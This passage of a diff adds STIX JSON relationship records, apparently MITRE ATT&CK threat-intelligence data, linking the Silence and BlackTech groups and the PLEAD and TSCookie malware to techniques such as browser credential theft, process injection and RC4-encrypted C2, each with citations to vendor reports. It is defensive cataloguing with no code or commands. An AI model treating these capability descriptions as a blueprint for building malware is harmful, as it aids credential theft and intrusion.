+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "(Citation: Group IB Silence Sept 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--da331399-4c9f-4a16-92b1-97e635703c18",
+ "type": "relationship",
+ "modified": "2020-05-06T03:13:43.392Z",
+ "created": "2020-05-06T03:13:43.392Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--d13c8a7f-740b-4efa-a232-de7d6bb05321",
+ "target_ref": "tool--3433a9e8-1c47-4320-b9bf-ed449061d1c3",
+ "external_references": [
+ {
+ "source_name": "Group IB Silence Aug 2019",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf",
+ "description": "Group-IB. (2019, August). Silence 2.0: Going Global. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "(Citation: Group IB Silence Aug 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--1567fbd3-5d2b-4040-a736-11f3d5e2139f",
+ "type": "relationship",
+ "modified": "2020-05-06T03:23:03.604Z",
+ "created": "2020-05-06T03:23:03.604Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--d13c8a7f-740b-4efa-a232-de7d6bb05321",
+ "target_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082",
+ "external_references": [
+ {
+ "source_name": "Group IB Silence Aug 2019",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf",
+ "description": "Group-IB. (2019, August). Silence 2.0: Going Global. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has used a valid certificate to sign their primary loader Silence.Downloader (aka TrueBot).(Citation: Group IB Silence Aug 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--908f1fa6-c797-47c3-bcb1-3438a9105095",
+ "type": "relationship",
+ "modified": "2020-05-06T03:32:07.175Z",
+ "created": "2020-05-06T03:32:07.175Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b57f419e-8b12-49d3-886b-145383725dcd",
+ "target_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea",
+ "external_references": [
+ {
+ "source_name": "JPCert PLEAD Downloader June 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[PLEAD](https://attack.mitre.org/software/S0435) has the ability to proxy network communications.(Citation: JPCert PLEAD Downloader June 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--6e23cb4f-61dd-4a6a-8c25-7eb79c376558",
+ "type": "relationship",
+ "modified": "2020-05-06T15:26:38.753Z",
+ "created": "2020-05-06T15:26:38.753Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b57f419e-8b12-49d3-886b-145383725dcd",
+ "target_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41",
+ "external_references": [
+ {
+ "source_name": "JPCert PLEAD Downloader June 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[PLEAD](https://attack.mitre.org/software/S0435) has used RC4 encryption to download modules.(Citation: JPCert PLEAD Downloader June 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--f09f6c15-193c-406a-ab64-bf730d83f39f",
+ "type": "relationship",
+ "modified": "2020-05-06T15:26:38.799Z",
+ "created": "2020-05-06T15:26:38.799Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b57f419e-8b12-49d3-886b-145383725dcd",
+ "target_ref": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[PLEAD](https://attack.mitre.org/software/S0435) has the ability to list open windows on the compromised host.(Citation: TrendMicro BlackTech June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--e98a5dc7-707a-4933-801a-b98b2e44b309",
+ "type": "relationship",
+ "modified": "2020-05-06T15:26:38.825Z",
+ "created": "2020-05-06T15:26:38.825Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b57f419e-8b12-49d3-886b-145383725dcd",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "JPCert PLEAD Downloader June 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[PLEAD](https://attack.mitre.org/software/S0435) has the ability to upload and download files to and from an infected host.(Citation: JPCert PLEAD Downloader June 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--9020d567-103b-4dc2-b27d-115078ae2a76",
+ "type": "relationship",
+ "modified": "2020-05-06T15:26:38.829Z",
+ "created": "2020-05-06T15:26:38.829Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b57f419e-8b12-49d3-886b-145383725dcd",
+ "target_ref": "attack-pattern--f7c0689c-4dbd-489b-81be-7cb7c7079ade",
+ "external_references": [
+ {
+ "source_name": "ESET PLEAD Malware July 2018",
+ "url": "https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/",
+ "description": "Cherepanov, A.. (2018, July 9). Certificates stolen from Taiwanese tech\u2011companies misused in Plead malware campaign. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[PLEAD](https://attack.mitre.org/software/S0435) samples were found to be highly obfuscated with junk code.(Citation: ESET PLEAD Malware July 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--8ee24ce1-0703-43dc-8b27-807747ca0209",
+ "type": "relationship",
+ "modified": "2020-05-06T15:26:38.839Z",
+ "created": "2020-05-06T15:26:38.839Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b57f419e-8b12-49d3-886b-145383725dcd",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "JPCert PLEAD Downloader June 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[PLEAD](https://attack.mitre.org/software/S0435) has the ability to execute shell commands on the compromised host.(Citation: JPCert PLEAD Downloader June 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--21711eb2-eddd-40f5-8c20-dc50495c102d",
+ "type": "relationship",
+ "modified": "2020-05-06T15:26:38.849Z",
+ "created": "2020-05-06T15:26:38.849Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b57f419e-8b12-49d3-886b-145383725dcd",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[PLEAD](https://attack.mitre.org/software/S0435) has the ability to delete files on the compromised host.(Citation: TrendMicro BlackTech June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--947a4837-cce1-48dd-b4e7-8d08d8dce663",
+ "type": "relationship",
+ "modified": "2020-05-06T15:26:38.855Z",
+ "created": "2020-05-06T15:26:38.855Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b57f419e-8b12-49d3-886b-145383725dcd",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "JPCert PLEAD Downloader June 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[PLEAD](https://attack.mitre.org/software/S0435) has used HTTP for communications with command and control (C2) servers.(Citation: JPCert PLEAD Downloader June 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--213423ab-05cf-4354-9cea-d536686cf21d",
+ "type": "relationship",
+ "modified": "2020-05-06T15:26:38.863Z",
+ "created": "2020-05-06T15:26:38.863Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b57f419e-8b12-49d3-886b-145383725dcd",
+ "target_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0",
+ "external_references": [
+ {
+ "source_name": "ESET PLEAD Malware July 2018",
+ "url": "https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/",
+ "description": "Cherepanov, A.. (2018, July 9). Certificates stolen from Taiwanese tech\u2011companies misused in Plead malware campaign. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[PLEAD](https://attack.mitre.org/software/S0435) has the ability to steal saved passwords from Microsoft Outlook.(Citation: ESET PLEAD Malware July 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--5dd0d491-bb82-45b4-91cd-a7d9e4cf396e",
+ "type": "relationship",
+ "modified": "2020-05-06T15:26:38.870Z",
+ "created": "2020-05-06T15:26:38.870Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b57f419e-8b12-49d3-886b-145383725dcd",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[PLEAD](https://attack.mitre.org/software/S0435) has been executed via malicious e-mail attachments.(Citation: TrendMicro BlackTech June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--80389d5a-b92b-4101-930b-5be361e53eb8",
+ "type": "relationship",
+ "modified": "2020-05-06T15:26:38.952Z",
+ "created": "2020-05-06T15:26:38.952Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b57f419e-8b12-49d3-886b-145383725dcd",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ },
+ {
+ "source_name": "JPCert PLEAD Downloader June 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[PLEAD](https://attack.mitre.org/software/S0435) has the ability to list drives and files on the compromised host.(Citation: TrendMicro BlackTech June 2017)(Citation: JPCert PLEAD Downloader June 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--884019ca-fca8-46a8-8dc4-71f60427db0f",
+ "type": "relationship",
+ "modified": "2020-05-06T15:26:38.963Z",
+ "created": "2020-05-06T15:26:38.963Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b57f419e-8b12-49d3-886b-145383725dcd",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[PLEAD](https://attack.mitre.org/software/S0435) has the ability to list processes on the compromised host.(Citation: TrendMicro BlackTech June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--dd4da2e6-a54b-4420-9ed6-ebb3080bd2f8",
+ "type": "relationship",
+ "modified": "2020-05-06T15:26:38.958Z",
+ "created": "2020-05-06T15:26:38.958Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b57f419e-8b12-49d3-886b-145383725dcd",
+ "target_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ },
+ {
+ "source_name": "ESET PLEAD Malware July 2018",
+ "url": "https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/",
+ "description": "Cherepanov, A.. (2018, July 9). Certificates stolen from Taiwanese tech\u2011companies misused in Plead malware campaign. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[PLEAD](https://attack.mitre.org/software/S0435) has the ability to steal saved credentials from web browsers.(Citation: TrendMicro BlackTech June 2017)(Citation: ESET PLEAD Malware July 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--f1952dea-f9d6-421b-947e-502796e2c883",
+ "type": "relationship",
+ "modified": "2020-05-06T15:26:38.970Z",
+ "created": "2020-05-06T15:26:38.970Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b57f419e-8b12-49d3-886b-145383725dcd",
+ "target_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[PLEAD](https://attack.mitre.org/software/S0435) has been executed via malicious links in e-mails.(Citation: TrendMicro BlackTech June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--a77818b1-bbe8-477f-a8b1-1704e525d5a9",
+ "type": "relationship",
+ "modified": "2020-05-06T15:26:38.977Z",
+ "created": "2020-05-06T15:26:38.977Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6fe8a2a1-a1b0-4af8-953d-4babd329f8f8",
+ "target_ref": "malware--76ac7989-c5cc-42e2-93e3-d6c476f01ace",
+ "external_references": [
+ {
+ "source_name": "JPCert TSCookie March 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, March 6). Malware \u201cTSCookie\u201d. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "(Citation: JPCert TSCookie March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--c756d00a-9ca0-435e-b226-bff2c123b390",
+ "type": "relationship",
+ "modified": "2020-05-06T15:48:01.508Z",
+ "created": "2020-05-06T15:48:01.508Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6fe8a2a1-a1b0-4af8-953d-4babd329f8f8",
+ "target_ref": "malware--b57f419e-8b12-49d3-886b-145383725dcd",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ },
+ {
+ "source_name": "JPCert PLEAD Downloader June 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "(Citation: TrendMicro BlackTech June 2017)(Citation: JPCert PLEAD Downloader June 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--036f4704-ce28-49cf-bb57-e4ce5079981e",
+ "type": "relationship",
+ "modified": "2020-05-06T15:48:01.780Z",
+ "created": "2020-05-06T15:48:01.780Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--76ac7989-c5cc-42e2-93e3-d6c476f01ace",
+ "target_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9",
+ "external_references": [
+ {
+ "source_name": "JPCert TSCookie March 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, March 6). Malware \u201cTSCookie\u201d. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[TSCookie](https://attack.mitre.org/software/S0436) has been executed via malicious links embedded in e-mails spoofing the Ministries of Education, Culture, Sports, Science and Technology of Japan.(Citation: JPCert TSCookie March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--d15c7116-2d00-48cd-9003-1ab6fc4a0076",
+ "type": "relationship",
+ "modified": "2020-05-06T17:47:43.785Z",
+ "created": "2020-05-06T16:06:23.629Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--76ac7989-c5cc-42e2-93e3-d6c476f01ace",
+ "target_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea",
+ "external_references": [
+ {
+ "source_name": "JPCert BlackTech Malware September 2019",
+ "url": "https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html",
+ "description": "Tomonaga, S.. (2019, September 18). Malware Used by BlackTech after Network Intrusion. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[TSCookie](https://attack.mitre.org/software/S0436) has the ability to proxy communications with command and control (C2) servers.(Citation: JPCert BlackTech Malware September 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7c119557-d417-4708-a024-5be9c4d4d86c",
+ "type": "relationship",
+ "modified": "2020-07-07T14:05:07.563Z",
+ "created": "2020-05-06T17:47:43.569Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--76ac7989-c5cc-42e2-93e3-d6c476f01ace",
+ "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
+ "external_references": [
+ {
+ "source_name": "JPCert BlackTech Malware September 2019",
+ "url": "https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html",
+ "description": "Tomonaga, S.. (2019, September 18). Malware Used by BlackTech after Network Intrusion. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[TSCookie](https://attack.mitre.org/software/S0436) has the ability to inject code into the svchost.exe, iexplorer.exe, explorer.exe, and default browser processes.(Citation: JPCert BlackTech Malware September 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--2a7a5ee2-e949-4d25-895a-43ba0bc8cc33",
+ "type": "relationship",
+ "modified": "2020-07-07T14:05:07.560Z",
+ "created": "2020-05-06T17:47:43.597Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--76ac7989-c5cc-42e2-93e3-d6c476f01ace",
+ "target_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b",
+ "external_references": [
+ {
+ "source_name": "JPCert BlackTech Malware September 2019",
+ "url": "https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html",
+ "description": "Tomonaga, S.. (2019, September 18). Malware Used by BlackTech after Network Intrusion. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[TSCookie](https://attack.mitre.org/software/S0436) can use ICMP to receive information on the destination server.(Citation: JPCert BlackTech Malware September 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--20c30f4a-ff6f-4861-a88a-77d437374994",
+ "type": "relationship",
+ "modified": "2020-07-07T14:05:07.581Z",
+ "created": "2020-05-06T17:47:43.602Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--76ac7989-c5cc-42e2-93e3-d6c476f01ace",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "JPCert TSCookie March 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, March 6). Malware \u201cTSCookie\u201d. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[TSCookie](https://attack.mitre.org/software/S0436) has the ability to upload and download files to and from the infected host.(Citation: JPCert TSCookie March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--1e54c837-6d59-40dc-a114-3bcef0037327",
+ "type": "relationship",
+ "modified": "2020-05-06T17:47:43.610Z",
+ "created": "2020-05-06T17:47:43.610Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--76ac7989-c5cc-42e2-93e3-d6c476f01ace",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "JPCert TSCookie March 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, March 6). Malware \u201cTSCookie\u201d. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[TSCookie](https://attack.mitre.org/software/S0436) has the ability to identify the IP of the infected host.(Citation: JPCert TSCookie March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--ce801c17-399a-426a-a4ec-1b7361ba9d4d",
+ "type": "relationship",
+ "modified": "2020-07-04T01:49:03.708Z",
+ "created": "2020-05-06T17:47:43.677Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--76ac7989-c5cc-42e2-93e3-d6c476f01ace",
+ "target_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41",
+ "external_references": [
+ {
+ "source_name": "JPCert TSCookie March 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, March 6). Malware \u201cTSCookie\u201d. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[TSCookie](https://attack.mitre.org/software/S0436) has encrypted network communications with RC4.(Citation: JPCert TSCookie March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--bfe30cdf-a0c8-440d-b471-d9fef00c559b",
+ "type": "relationship",
+ "modified": "2020-05-06T17:47:43.683Z",
+ "created": "2020-05-06T17:47:43.683Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--76ac7989-c5cc-42e2-93e3-d6c476f01ace",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "JPCert TSCookie March 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, March 6). Malware \u201cTSCookie\u201d. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[TSCookie](https://attack.mitre.org/software/S0436) has the ability to list processes on the infected host.(Citation: JPCert TSCookie March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--1cc625dd-3079-4aa5-99f5-db1897795500",
+ "type": "relationship",
+ "modified": "2020-05-06T17:47:43.687Z",
+ "created": "2020-05-06T17:47:43.687Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--76ac7989-c5cc-42e2-93e3-d6c476f01ace",
+ "target_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8",
+ "external_references": [
+ {
+ "source_name": "JPCert TSCookie March 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, March 6). Malware \u201cTSCookie\u201d. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[TSCookie](https://attack.mitre.org/software/S0436) has the ability to steal saved passwords from the Internet Explorer, Edge, Firefox, and Chrome browsers.(Citation: JPCert TSCookie March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--426c8308-0856-4dad-85e6-87df276cfa69",
+ "type": "relationship",
+ "modified": "2020-05-06T17:47:43.697Z",
+ "created": "2020-05-06T17:47:43.697Z"
+ },
+ {
